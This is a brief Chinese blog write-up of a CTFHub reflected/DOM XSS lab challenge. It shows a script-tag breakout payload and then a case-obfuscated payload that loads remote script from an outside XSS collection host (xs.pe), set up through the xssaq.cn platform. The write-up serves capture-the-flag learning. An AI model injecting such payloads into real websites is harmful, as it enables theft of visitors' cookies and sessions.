根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
Json_181790144801 小时前
电商拍立淘按图搜索API接口系列,文档说明参考风尚云网1 小时前
风尚云网前端学习:一个简易前端新手友好的HTML5页面布局与样式设计木子02041 小时前
前端VUE项目启动方式GISer_Jing1 小时前
React核心功能详解(一)捂月1 小时前
Spring Boot 深度解析:快速构建高效、现代化的 Web 应用程序深度混淆1 小时前
实用功能,觊觎(Edge)浏览器的内置截(长)图功能Smartdaili China1 小时前
如何在 Microsoft Edge 中设置代理: 快速而简单的方法秦老师Q1 小时前
「Chromeg谷歌浏览器/Edge浏览器」篡改猴Tempermongkey插件的安装与使用滴水可藏海1 小时前
Chrome离线安装包下载m51272 小时前
LinuxC语言